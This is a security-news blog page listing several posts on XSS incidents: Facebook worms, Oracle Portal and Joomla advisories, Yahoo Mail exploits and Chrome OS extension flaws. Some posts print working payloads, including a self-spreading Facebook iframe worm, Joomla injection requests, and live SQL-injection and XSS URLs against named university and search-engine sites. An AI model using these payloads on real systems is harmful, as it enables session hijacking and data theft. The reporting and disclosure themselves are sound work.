Showing posts sorted by relevance for query XSS. Sort by date Show all posts
Showing posts sorted by relevance for query XSS. Sort by date Show all posts

Recent Facebook XSS Attacks Show Increasing Sophistication

Posted by Avik Sarkar On 4/25/2011 01:09:00 pm

A few weeks ago, three separate cross-site scripting (XSS) vulnerabilities on Facebook sites were uncovered within a period of about 10 days. At least two of these holes were used to launch viral links or attacks on users – and it’s clear that attacks against Facebook users are becoming increasingly sophisticated.
The first issue came from a page on the mobile version of Facebook’s site. The interface was a prompt for posting stories to a user’s wall, and the parameter for the text of the prompt did not properly escape output. On March 28, a blogger identifying themselves as “Joy CrazyDaVinci”posted code that demonstrated how the vulnerability could be used to spread viral links:
<iframe id=”CrazyDaVinci” style=”display:none;”
src=”http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’<script>window.onload=function(){document.forms[0].message.value=’Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!‘;document.forms[0].submit();}</script>”></iframe>
This bit of HTML would be included in a viral page. The code sets the content of the wall post to a message that includes a link to a viral page, then submits the prompt automatically. Anyone clicking the link would get the same code executed on their account. The viral page could be used for malware distribution or phishing attacks, but in most cases where I saw this trick used, the page simply loaded advertisements or “offer spam”.
By the next day, several links were spreading virally and caught the attention of security researchers. Facebook moved quickly to patch the issue, and Crazy DaVinci issued an apology for the example code, explaining that versions of it had actually been circulating for several days prior and that the demonstration was intended to push Facebook for a fix.
On April 3, another XSS problem came to light, this time with a Facebook “channel” page used for session management. Both another security researcher and I had previously looked at this interface and found it properly escaped, so it’s likely a code update mistakenly changed the page’s behavior. Facebook again patched the problem soon after news of it spread.
I didn’t observe any viral exploitation of the second vulnerability in the wild, but after the first problem came to light, I noted that it was mostly used to submit a form already on the page for posting links. The payload made use of functionality within the vulnerable page, but XSS allows an attacker to do far more. I wondered when we might see a Facebook attack that made greater use of cross-site scripting’s potential.

What a Difference a Space Makes

I didn’t have to wait long. On April 7, I got word via Twitter of a Facebook app that had live XSS, but the app had disappeared before I got to see it in action. At first, I thought this was yet another case of XSS within the context of a Facebook app. But I soon found other version of the app which were still online, and I quickly realized this was actually an XSS problem with the Facebook Platform. Also, the XSS payload being used did much more than submit a form.
The attack used FBML-based Facebook apps, which render in the context of an apps.facebook.com page. Normally, Facebook filters code to prevent any scripts from directly modifying the page’s DOM, but the XSS problem gave attackers a bypass. When a user visited the app page, they would see what appeared to be a fairly benign page with a popular video.
Unlike many Facebook page scams, the promised video actually works – if you click play, the video will load and nothing unusual seems to happen. But as the code screenshot below reveals, that click does much more than load the video.
When the page first loads, the “video” is actually just an image placeholder with a link. Part of the href parameter for that link is shown above. Note the space after the opening quotation mark – that’s where the XSS comes in. Normally, Facebook would block a link to a javascript: URL. Adding the space worked around Facebook’s filters, but the browser would still execute the rest of parameter.
According to Facebook, it turned out that some older code was using PHP’s built-in parse_url function to determine allowable URLs. For example, while parse_url(“javascript:alert(1)”) yields a scheme of “javascript” and a path of “alert(1)”, adding whitespace gives a different result: parse_url(” javascript:alert(1)”) does not return a scheme and has a path of “javascript:alert(1)”. Other PHP developers should take note of the difference if parse_url is being used in security-related code.

A More Advanced Attack

Clicking the link executed an inline script that in turn added a script element to the page. This loaded more code from a remote address and included several parameters in the GET request. The parameters set variables within the remote code that specified what video to load, what URLs to use for viral posts, and so on. Multiple Facebook apps and domains were used for the viral links, but the main script always came from the same host. This helped the attack persist, since blocking one site would not stop it and the central code was loaded dynamically.
The remote code handled actually loading the video, but also included a number of functions which make use of having script access in a facebook.com context. The script would set the user as attending spam events, invite friends to those events, “like” a viral link, and even send IMs to friends using Facebook Chat.
When I came across the attack, one block of code had been commented out, but one bloggerdiscovered a version of the attack a few days prior and saw it in action. This part loaded a fake login form which actually sent the entered username and password to a log interface on the attacker’s server. (Remember, this phishing form would appear in the context of a page with typical Facebook chrome.) Since the attack page would load even if a user was not logged in to Facebook, this could have also been a way to make sure a session was available before launching the other functions.
Fake videos and viral links are nothing new on Facebook, but most of these scams tend to be fairly simple. In fact, it’s not hard to find forums where people offer boilerplate code for launching such schemes – much like the first XSS worm above which simply submitted a form. But the April XSS attack involved multiple domains, multiple user accounts, and multiple methods for spreading and hijacking user accounts. And it still only scratched the surface of what’s possible with an XSS vulnerability. I expect we’ll see more XSS-based attacks and more powerful payloads in the future.

Postscript on Real-Time Research

I came across the April attack late one afternoon as I was preparing to leave work… so I could present on XSS at a local OWASP meeting! Those following me on Twitter saw a somewhat frantic stream of tweets as I tried to find live examples of the attack and sorted through the code while closely watching the clock and wrapping up last-minute presentation details. Earlier this week, I did some searching to review information for this post, and I came across this article from eWEEK: “Facebook Bully Video Actually an XSS Exploit“.
I was a bit surprised by it, as I hadn’t known about it before and saw that it quoted me. I then realized it was quoting my tweets! I then read that I had “confirmed to eWEEK on Twitter” one aspect of the story. At first I was confused, but then remembered that during my flood of tweeting, another user had sent an @ reply asking about the very detail the story talked about. Checking that tweet again, I found out the question had come from the article’s author.
I relate all this not because any of it bothered me, simply because (1) I found it somewhat fascinating that a few quick Twitter updates could become the primary source for a news article and (2) I was humbled to realize that a few quick Twitter updates could become the primary source for a news article! While it’s great that a story can spread so fast, it was certainly gave me a reminder to be careful when discussing topics of interest on a public forum. But I’m glad I can do my part in helping raise awareness of online dangers, particular the implications of XSS.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

XSS in Oracle AS Portal 10g

Posted by Avik Sarkar On 5/03/2011 04:44:00 pm 


I. VULNERABILITY
-------------------------
XSS in Oracle Portal Database Access Descriptor

II. BACKGROUND
-------------------------
Oracle AS Portal is a Web-based application for building and deploying
portals. It provides a secure, manageable environment for accessing
and interacting with enterprise software services and information
resources.

III. DESCRIPTION
-------------------------
Has been detected a reflected XSS vulnerability in Oracle Application
Server, that allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser.

The code injection is done through the DAD name. A DAD (Database
Access Descriptor) is a set of values that specifies how a database
server should fulfill a HTTP request.

IV. PROOF OF CONCEPT
-------------------------
Original request:
http://<oracle-application-server>/portal/pls/<DAD>

Malicious request:
http://<oracle-application-server>/portal/pls/<XSS injection>

Example 1:
http://<oracle-application-server>/portal/pls/"<H1>XSS vulnerability<XSS

In this scenario, the attacker has the difficulty of being unable to
close the HTML tag because he's can not add the character "/" as part
of the code injection (DAD name). However, it is possible to generate
that character without appearing in the injection. Below is an example.

Example 2:
http://<oracle-application-server>/portal/pls/"<img src=""
onmouseover="document.body.innerHTML=String.fromCharCode(60,72,84,77,76,62,60,72,49,62,88,83,83,60,47,72,49,62,32,60,72,50,62,86,85,76,78,60,47,72,50,62);"><XSS

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, this can leverage to steal sensitive information as
user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
Tested in Oracle Application Server Portal (Oracle AS Portal) 10g,
version 10.1.2. Other versions may be affected too.

VII. SOLUTION
-------------------------
Install last CPU (Critical Patch Update).

VIII. REFERENCES
-------------------------
http://www.oracle.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
August  11, 2010: Initial release
May     01, 2011: Final revision

XI. DISCLOSURE TIMELINE
-------------------------
August  11, 2010: Discovered by Internet Security Auditors
August  11, 2010: Oracle contacted including PoC.
August  12, 2010: Oracle inform that will investigate
                  the vulnerability.
April   19, 2011: Oracle fixed the vulnerability in the
                  CPU (Critical Patch Update).
May     01, 2011: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are vendor independent provider with a deep expertise
since 2001. Our efforts in R&D include vulnerability research, open
security project collaboration and whitepapers, presentations and
security events participation and promotion. For further information
regarding our security services, contact us.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Egyptian Hackers Selling Zero-day Exploit of Yahoo Mail For $700

Posted by Avik Sarkar On 11/29/2012 06:02:00 pm

Egyptian Hackers Selling Zero-day Exploit of Yahoo Mail For $700

Those people who wander in many underground hackers community, knows very well that several unethical equipment such as Botnet, Zero-day exploit, black hole exploit kit, malware, undisclosed vulnerabilities and so on were sold there for different prices. Those products were generally priced between $5-$500, but today I will talk about an expensive product, which listed itself top on the black market. I am talking about a new cross-site scripting exploit that enables attackers to steal cookies and access Yahoo email accounts. According to the blog post of Krebs on Security -A zero-day vulnerability in yahoo.com that lets attackers hijack Yahoo! email accounts and redirect users to malicious Web sites offers a fascinating glimpse into the underground market for large-scale exploits. The exploit, being sold for $700 by an Egyptian hacker on an exclusive cybercrime forum, targets a “cross-site scripting” (XSS) weakness in yahoo.com that lets attackers steal cookies from Yahoo! Webmail users. Such a flaw would let attackers send or read email from the victim’s account. In a typical XSS attack, an attacker sends a malicious link to an unsuspecting user; if the user clicks the link, the script is executed, and can access cookies, session tokens or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. The hacker posted the following video to demonstrate the exploit for potential buyers. 


“I’m selling Yahoo stored xss that steal Yahoo emails cookies and works on ALL browsers,” wrote the vendor of this exploit, using the hacker handle ‘TheHell.’ “And you don’t need to bypass IE or Chrome xss filter as it do that itself because it’s stored xss. Prices around for such exploit is $1,100 – $1,500, while I offer it here for $700. Will sell only to trusted people cuz I don’t want it to be patched soon!” -said the hacker.  
In response Ramses Martinez, director of security at Yahoo!, said the challenge now is working out the exact yahoo.com URL that triggers the exploit, which is difficult to discern from watching the video. “Fixing it is easy, most XSS are corrected by simple code change,” Martinez said. “Once we figure out the offending URL we can have new code deployed in a few hours at most.”





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

CISCO & Intel is Vulnerable To XSS Said Ion (Team Openfire)

Posted by Avik Sarkar On 2/28/2012 06:38:00 pm

CISCO & Intel is Vulnerable To XSS Said Ion (Team Openfire)
A hacker named Ion from Team Openfire has found security holes in the official website of CISCO developer & Intel® Processors and Boards Compatibility Tool. The hacker claimed that he has reported both the authorities about the vulnerability. From them he did not get any positive reply so he decided to disclose the matter that CISCO & Intel websites are vulnerable to non-persistent XSS attacks. 

Intel:- 

The above screen shot have been submitted by the hacker which clearly indicating that Intel is indeed vulnerable to XSS attack. According to the hacker the search box of Intel® Processors and Boards Compatibility Tool is vulnerable to XSS . But later Intel confirms that the security hole has been patched. 

CISCO:-

Yet again the hacker also submitted the screen shot which clearly indicating that CISCO is indeed vulnerable to XSS attack. Here again he shared the vulnerability link with us. So far CSICO did not take this one seriously and the vulnerable status is un-patched.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Skype Shop & National Geographic Germany (Nat Geo) Vulnerable to XSS

Posted by Avik Sarkar On 12/26/2013 09:06:00 pm

Skype Shop & National Geographic Germany (Nat Geo) Vulnerable to XSS -Said Dr41DeY
Couple of weeks ago, I have talked about the vulnerability of Cartoon Network official website, today I am going to speak about two more big fish who are posing serious security holes in their official websites. Lets not waste time while stretching the preface and come directly to the story -it's the hacker who has recently made his name for some big hacks, has back again. 
Many of you are right, I am talking about 'Dr41DeY' because he is the guy who found vulnerability in the official website of Skype Shop and National Geographic Channel Germany (Nat Geo). Both Nat Geo and Skype have non persistent cross site scripting vulnerability also known as XSS vulnerability in their website. We have already informed this issue to concerning authority and webmaster to avoid misfortune. As expected, while writing this Skype have taken this issue seriously and fixed their loopholes immediately. Still for proof- above I have shared the screenshots with our readers, as evidence of the XSS hole. But unlike Skype Shop, Nat Geo yet not responded, so the vulnerability still exist on their portal. Hopefully they will take appropriate steps with out doing more delay. For updates in this story and also other hot cyber issues, just stay tuned with VOGH.  Before concluding, I would like to remind you that- in 2012 an Indian hacker named Akshay has found XSS holes in the official website of National Geographic. Again after a year, Dr41DeY found another Nat GEO site vulnerable to XSS, that definitely arises a doubt about the security concern of one of the world's leading satellite television channel featuring documentaries with factual content involving nature, science, culture, and history, plus some reality and pseudo-scientific entertainment programming. 


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Google Chrome OS Has Security Hole (Black Hat 2011)

Posted by Avik Sarkar On 8/05/2011 07:20:00 pm


Black Hat Google has billed its Chrome operating system as a security breakthrough that's largely immune to the threats that have plagued traditional computers for decades. With almost nothing stored on its hard drive and no native applications, there's no sensitive data that can pilfered and it can't be commandeered when attackers exploit common software vulnerabilities.
But according to two researchers who spent the past few months analyzing the Chrome-powered Cr-48 beta released in December, the browser-based OS is vulnerable to many of the same serious attacks that afflict people surfing websites. As a result, users remain susceptible to exploits that can intercept email, documents, and passwords stored on centralized servers, many of which are maintained by Google.
“Even though they put these awesome security protections in place, we're just moving the security problems to the cloud now,” Matt Johansen, a researcher with WhiteHat Security, told The Register. “We're moving the software security problem that we've been dealing with forever to the cloud. They're doing a lot of things right, but it's not the end all and be all for security.”
Virtually all of the threats identified by Johansen and his WhiteHat colleague Kyle Osborn stem from Chrome's reliance on extensions, which are essentially web-based applications. A fair number of the extensions they analyzed contain XSS, or cross-site scripting, bugs, which have the potential to inject malicious code and content into a visitor's browser and in some cases steal credentials used to authenticate user accounts.
As they went about testing what kind of attacks various XSS vulnerabilities could allow, Johansen and Osborn noticed something curious: a bug in one extension often allowed them to hijack the communications of a second extension, even when the latter one had no identifiable security flaws. At the Black Hat security conference in Las Vegas on Wednesday, they demonstrated this weakness by exploiting an XSS hole in one extension to steal passwords from an otherwise secure account on cloud password storage service LastPass.
“If any of the other vulnerable extensions have an XSS hole, we can utilize JavaScript to hijack that communication,” Johansen said. “LastPass is doing absolutely nothing wrong here. You can have an extension that's perfectly fine, but if you have another that has a cross-site scripting error in it we can still access information in secure applications.”
The discovery has generated a quandary for the researchers.
“Whose problem is this to fix?” Johansen continued. “We don't really have an answer for that. LastPass did everything correctly. It's the other extension developers that developed an extension with a vulnerability in it.”
After being informed of the specific attack, LastPass made changes to its Chrome extension that prevented it from being carried out, so it's reasonable to assume extension makers foot some of the responsibility for preventing their apps from being compromised by others. But Johansen couldn't rule out the possibility that vulnerabilities and other apps could probably make LastPass vulnerable again. He said Google might be able to fix the problem by overhauling the application programming interfaces extension developers use.
The researchers also demonstrated an XSS vulnerability in Scratchpad, a text-editor extension that's bundled with Chrome. By sharing files with names containing JavaScript commands stored on Google Docs they were able to obtain the Google session cookies of anyone who used a Chromebook to view the documents. An attacker could exploit the vulnerability to read a victim's email, or to send instant messages to everyone on the victim's contact list. If any of the contacts are using Chromebooks, they could be similarly vulnerable to booby-trapped filenames stored on Google Docs.
A Google spokeswoman defended the security of Chromebooks and said the vulnerabilities enumerated by the researchers weren't unique to the cloud-based OS. In an email, she issued the following statement:
This conversation is about the web, not Chrome OS. Chromebooks raise security protections on computing hardware to new levels. They are also better equipped to handle the web attacks that can affect browsers on any computing device, thanks in part to a carefully designed extensions model and the advanced security available through Chrome that many users and experts have embraced.
The researchers stressed Google engineers were extremely quick to fix the Scratchpad vulnerability and awarded them a $1,000 bounty for their report. But they remain convinced that the security of Chrome OS in many cases is only as strong as its' weakest extensions. They also pointed out that penetration-testing tools such as the Browser Exploitation Framework could be used to help streamline attacks in much the way Metasploit is used to manage exploits for traditional machines.
And, Johansen said, Chrome hacking through XSS may be only the beginning, since the flaws are among the easiest to find and exploit.
“Who knows what we're going to be looking for months or years from now when Google can figure out a way to thwart the cross-site scripting threat,” he said. “Why would we be trying to write buffer overflows when we can just write a simple JavaScript command.” 
-News Source (The Register)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Cartoon Network (CN) Official Website is Vulnerable to XSS Attack

Posted by Avik Sarkar On 12/10/2013 02:26:00 am

XSS Vulnerability Found in Cartoon Network's (CN) Official Website By Dr41DeY 
After the successful breach of 'DY365 TV' yet again the hacker going by the name of Dr41DeY from Nigerian Cyber Army targeted another TV network. Guess what, this time he caught even a bigger fish. Unlike defacement or breach this time the hacker did something what it called ethical or can be categorized in white-hat list. Okey now without pulling the intro more longer lets directly come to the story -and that is the official website of Cartoon Network is vulnerable of cross site scripting attack also known as XSS attack. Cartoon Network mostly known as CN is the worlds leader in broadcasting  animated programming, ranging from action to animated comedy & many more. This satellite channel is the most preferred channel for the children and teenagers between the ages of 7 to 5 among the whole of the world. So it is quit indisputable that the official website of Cartoon Network (CN) is indeed a valuable website which have large number of traffic everyday. But it is unclear that being such a big and popular brand name, why CN committed such a massacre while leaving XSS vulnerability in their official portal. Dr41DeY shared with VOGH, that the search box in the home page of CN poses non persistent XSS vulnerability. The above screen shots was taken as a proof of the story. I on behalf of Team VOGH has already contacted CN authorities, and knocked them about this issue. Hopefully they will take appropriate steps with out doing any further delay. For updates in this story and also other hot cyber issues, just stay tuned with VOGH.  


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Multiple XSS Vulnerabilities Found in Joomla! 1.7.0

Posted by Avik Sarkar On 9/30/2011 01:49:00 pm


Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site Scripting issues.

About Joomla:- 
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.


Vulnerability Description:-
Several parameters (searchword, extension, asset, author ) in Joomla! Core components are not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.


Version Affected:-
1.7.0 <=


PROOF-OF-CONCEPT/EXPLOIT:-
parameter: searchword, component: com_search (Browser: IE, Konqueror)
=======================================================
N.B. Our previous reported issue of "searchword" parameter XSS was not fixed completely.

[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
[/REQUEST]

User Login is required to execute the following XSSes.

Parameter: extension, Component:-
http://localhost/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22

Parameter:-
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=

Parameter:-
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22

Impact:-
Attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions.

Solution:-
Upgrade to Joomla! 1.7.1-stable or higher.

To download Joomla Click Here



 
 
-News Source (Joomla!)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Yahoo Mail Hit By XSS Exploit Putting 400 Million Users At Risk

Posted by Avik Sarkar On 1/13/2013 05:53:00 pm

Yahoo Mail Hit By XSS Exploit Putting 400 Million Users At Risk

Yet again mistrust growing in between the large number of Yahoo users, as it has been continuously failed to protect its customers from cyber attack. Late in last year we have seen that the two major services of Yahoo get compromised, which affects millions of its registered users across the globe. First it was Yahoo Voice, which get hacked while putting 450K users at high risk. Then it was the time for Yahoo Mail, where few Egyptian hacker figured out serious XSS vulnerabilities in Yahoo Mailing service  that lets attackers steal cookies from Yahoo Webmail users. Later cyber criminals made product while exploring that loop holes, that so called product or widely known as exploit was made available at high price in underground market and forums. As expected Yahoo immediately patched these loopholes, but now it seems they did not learn lesson from the decent past. 
You all may be wondering! what happened? Again the security of Yahoo fallen victim in front of hackers.  Shahin Ramezany, a hacker and independent security researcher have figure out a DOM-Based XSS vulnerability in Yahoo Mail that is exploitable in all major browsers. Ramezany tweeted about this issue whihc links to an YouTube video, where he demonstrated the hack. Shahin Ramezany also claimed that the exploit have put more than 400 Million yahoo users at risk


As soon as this story get spotted, Yahoo immediately responds the matter, in their official release a Yahoo spokesman said "We’ve been looking into it and the US have now confirmed that they are investigating too. They will be in touch if there is a comment – otherwise I recommend that if users are concerned then they should change their passwords immediately." 

Later Yahoo said that thy have plugged the security hole. In their statement the spokesperson added, “At Yahoo! we take security very seriously and invest heavily in measures to protect our users and their data. We were recently informed of an online video that demonstrated a vulnerability. We confirm that the vulnerability has been fixed. In addition, we are investigating recent reports of increased abusive traffic and will work diligently to fix any vulnerabilities that are found. Concerned users are encouraged to change their passwords to a safe password that combines letters, numbers, and symbols.”

But this issue did not get completely resolved, as immediately after the fix release of Yahoo, Shahin Ramezany said that the fix is not good enough, and the Yahoo Mail exploit is still active. In his twitter he said "not effective enough and users are still [at] risk," since the proof-of-concept code can be easily tweaked to continue attacks. 





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Firefox 4 vs. Internet Explorer 9: Which is Safer???

Posted by Avik Sarkar On 5/13/2011 10:54:00 pm




The app frenzy is firing the browser wars and accelerating the need for browser development and updates. Chrome seems to update daily, Firefox is getting faster in response and Microsoft is talking IE 10 just IE9 gets fully out of the gate.
Because of the constant changes, it's hard to truly evaluate any given browser on any given day. Even so, there are certain key elements that distinguish one browser from another in terms of security. Here's how two of them, Firefox 4 and Internet Explorer 9, measure up:


Firefox 4
Firefox 4 is packed with security features aimed at resolving common, but difficult-to-avoid attacks such as cross site scripting (XSS), redirects from secure HTTPS webpages to plain old HTTP, and click-jacking.


Firefox 4 uses Content Security Policy (CSP) to quickly identify and block XSS attempts by simply using the server headers to tell it what kind of content to expect and, therefore, which content to block based on its lack of adherence to the server's own CSP.
This beats the heck out of comparing strings from browser and server in the remote hope of preventing XSS. Not only is the string approach akin to matching needles in thousands of remote haystacks, when it did deliver a finding, that finding was usually wrong. Developers often turned off such attempts, as found in IE 8's X-XSS-protection, out of sheer frustration.


However, CSP, though far more efficient, can also give a false positive reading if the website developer fails to sufficiently cover all the features with its policy. Still, CSP beats the string approach hands-down.


Other improvements are equally attractive from a harder to track user-agent header to a do-not-track feature that requires a simple opt-in to enable. However, the do not track feature works on an honor system: the site is notified of your desire for privacy but they don't have to comply with your request.


The strict transport security (STS) feature allows the user to force an HTTPS connection to user chosen sites. For example, the user can force an HTTPS connection-only to Facebook or other social sites thereby avoiding SSL strip attacks on those pages.
Firefox 4 also hides visited links from a hacker. The user still sees a visited link change color but the hacker doesn't. The CSS tweak hides your link viewing in the browser history from prying eyes.



Internet Explorer 9 (IE9)
IE9, says Microsoft, blocked 99 percent of socially engineered malware attacks. If the claim is true, then that's five times more than Firefox. However, both Mozilla and Google contest the interpretation as a definitive competitive edge for IE9 since the type of malware the finding applies to is not a common threat.


It is important to remember too that IE is targeted more often than Firefox simply because of economies of scale. The bad guys know that even people who use Firefox or Chrome often also have IE on their computer and use it at least occasionally. Therefore it makes tons of economic sense for hackers to target it over the competition.


In any case, IE9 is a significant upgrade from previous versions. It appears to run faster too, which is helpful.


Active X can be easily filtered and the user can choose to block or proceed accordingly.
Tracking protection is a new feature that enables users to control what they share. The Tracking Protection List, published by partners PrivacyChoice, TRUSTe, Abine and Adblock Plus, notifies companies if users don't want to be followed. However, just like with FireFox 4, the do not track feature works on an honor system; the site is notified of your desire for privacy but they don't have to comply with your request.
The download manager has an integrated SmartScreen malware protection feature. The Smartscreen Application Reputation cuts down on the aggravation factor as much as it does on security threats. It greatly reduces the number of warning prompts by dropping them entirely from frequently visited sites and warns only when the likelihood of malware is high. The "pinning" feature also helps as it allows users to "pin" frequently-visited and trusted sites to the browser toolbar, which then runs them in their own session. The pinning feature helps prevent HTTPS to HTTP redirects.
IE9 also has improved memory protection to prevent hackers from exploiting memory related vulnerabilities in the browser or any of its add-ons.
And the winner is ...
The consumer!


As of this point, security is no longer a major deciding factor in which browser you should use since both have seriously beefed-up protection. Not that you're totally safe from hackers, but at least these two browsers have finally bolted the doors and locked the windows.


A prolific and versatile writer, Pam Baker's published credits include numerous articles in leading publications including, but not limited to: Institutional Investor magazine, CIO.com, NetworkWorld, ComputerWorld, IT World, Linux World, Internet News, E-Commerce Times, LinuxInsider, CIO Today Magazine, NPTech News (nonprofits), MedTech Journal, I Six Sigma magazine, Computer Sweden, NY Times, and Knight-Ridder/McClatchy newspapers. She has also authored several analytical studies on technology and eight books. Baker also wrote and produced an award-winning documentary on paper-making. She is a member of the National Press Club (NPC), Society of Professional Journalists (SPJ), and the Internet Press Guild (IPG).

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Facebook, spammers are in 'arms race'

Posted by Avik Sarkar On 5/17/2011 01:32:00 pm



Within days of Facebook rolling out new security features designed to block spam, several new social-engineering attacks were spreading that somehow managed to get by the company's antispam defenses.
The spammers have modified their handiwork so it will get past Facebook's scam detection system, company spokesman Fred Wolens told today.
"There are new methods they've picked up after we put out the protections on Thursday," he said. "It's an arms race. We put out new protections and they come up with new campaigns...When we announced the new security features, they were calibrated for all the self-XSS attacks we'd seen at the time."


The company began turning on a feature last week that displays warnings when it detects that users are about to be duped by cross-site scripting (XSS) and clickjacking attacks. In such attacks, people are tricked into clicking something (clickjacking) or pasting some code into their browser Web address bar (XSS).
Yet there were several XSS attacks this weekend and today and warnings were not displayed. In one of them, users were tempted with a post that said "Facebook now has a dislike button! Click 'Enable Dislike Button' to turn on the new feature!" (On a side note, Wolens artfully dodged the question of whether Facebook would ever add a "dislike" button.)
Another attack falsely offered a way to see how many people viewed you on Facebook as an indication of how popular you are and urged people to click the "Scan Profile" link. The links lead to an external site where eventually the user is prompted to cut and paste Javascript code into the browser address bar, said Satnam Narang, a threat analyst at M86. (Facebook does not offer a way to see such statistics on profiles.)
A third attack tempted people with a comment of "WTF!! You look so stupid in this video" or something similar. A Flash file is loaded when the link is clicked and people were encouraged to press the CTRL and V keys and malicious JavaScript would be pasted from the clipboard into the browser address bar, according to this Zscaler blog post.
In all the cases the user action results in the spam messages being re-posted to the victim's Facebook pages and those of their friends. Ultimately, surveys are proffered for the victim to fill out. The spammers get money for each survey completed and the farther the spam spreads the more money that can be made.
Facebook did not disclose exactly what is going on behind the scenes, which could be used to help spammers in their efforts. Narang said he suspected that some of the spam was getting past Facebook's defenses by obfuscating the Javascript. Facebook seems to have made it harder for spammers to create campaigns that automatically execute and spam your friends, so that victims are sent off to external sites and required to cut and paste text into their browsers, he said.

 But "the hole is still there because they are still able to generate these posts," by tricking users into clicking links and following further instructions, he added.
Facebook is learning and improving the situation with each new spam campaign and iteration of its defenses, Wolens said.
"Within a few hours of this video (spam campaign) we were able to put that information back into the system to protect people," he said.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

vulnerability on university of manchester and university of liverpool's website

Posted by Avik Sarkar On 5/26/2011 01:05:00 pm

Multiple vulnerability found by Zero on the university of manchester and university of liverpool's website


University Of Manchester:- 
webiste: - http://www.manchester.ac.uk/
Vulnerability: - SQL-i & Non persistence XSS


Vulnerable Link(SQL-i):- http://www.manchester.ac.uk/aboutus/news/archive/list/?year=2011&month=-02+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+FROM+information_schema.tables%20WHERE%20table_schema=database%28%29--


Vulnerable Link(XSS):- http://www.manchester.ac.uk/aboutus/search/index.htm?num=10&as_dt=i&oe=UTF8&ie=UTF8&access=p&filter=1&numgm=5&output=xml_no_dtd&client=MAN_aboutus_search&site=University&q=%3Cscript%3Ealert%28%22A%22%29%3C/script%3E

University Of Liverpool:-

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Babylon Search Engine Is XSS Vulnerable Said Darklord

Posted by Avik Sarkar On 12/05/2011 03:51:00 pm


XSS vulnerability found by Darklord on Babylon search engine. According to the hacker Babylon search engine is vulnerable to a particular type of XSS attack. It can be XSSed by first adding a normal string at the beginning and then pushing the script. Since the search engine has implemented XSS filtering so it can be bypassed by crafting a different vector like the one shown in the screenshot


Vulnerable Link Submitted By The Hacker:-
http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hackingalert%27%29%3B%3C%2Fscript%3Ehelloworld&babsrc=home&s=web&as=0&t=0




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

XSS vulnerability on National Space Agency Pakistan & Pak Gov Radio's Websites

Posted by Avik Sarkar On 5/03/2011 02:14:00 am



The National Space Agency of Pakistan Website is XSS vulnerable
website link is:-
http://www.suparco.gov.pk/




Also 
Paksitani Govt. Radio station's official website is vulnerable to XSS attack.
website link:-
www.radio.gov.pk


These 2 vulnerability Has been found by XSS master Zero Cool.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Vulnerability in Standford University & China-airlines Website found by Minhal

Posted by Avik Sarkar On 6/28/2011 04:51:00 pm

